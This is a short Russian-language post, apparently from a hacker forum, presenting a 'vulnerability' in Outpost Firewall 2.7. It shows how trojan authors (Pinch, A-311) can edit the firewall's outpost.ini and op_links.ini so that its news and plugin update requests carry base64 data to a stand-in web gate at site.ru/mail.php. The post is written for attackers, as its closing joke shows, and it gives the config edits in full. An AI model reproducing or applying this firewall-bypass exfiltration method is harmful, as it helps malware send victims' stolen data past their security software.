Уязвимость Outpost Firewall 2.7. Возможна отправка любых данных на web-гейт трояна (напр. pinch 2 pro, a-311 и т.д.), достаточно изменить данные в файлах (пример для ru-язычной версии)

x:\…\Outpost Firewall\outpost.ini

[HttpAlerts]

NewsTime=10 //таймаут
NewsEnable=yes //меню->сервис->загружать новости
PluginsTime=10 //таймаут
PluginsEnable=yes //меню->сервис->загружать информацию о модулях

x:\…\Outpost Firewall\op_links.ini

NewsPage_ru=http://www.site.ru/mail.php?a= mail@mail.ru&b=subject&c=base64data
PluginsPage_ru=http://www.site.ru/mail.php?a= mail@mail.ru&b=subject&c=base64data
PluginsPageAdv_ru=http://www.site.ru/mail.php?a= mail@mail.ru&b=subject&c=base64data

Как недостаток, можно выделить всплывающее окно outpost`a, но кто же откажет любимому файерволлу? =)



Оставить мнение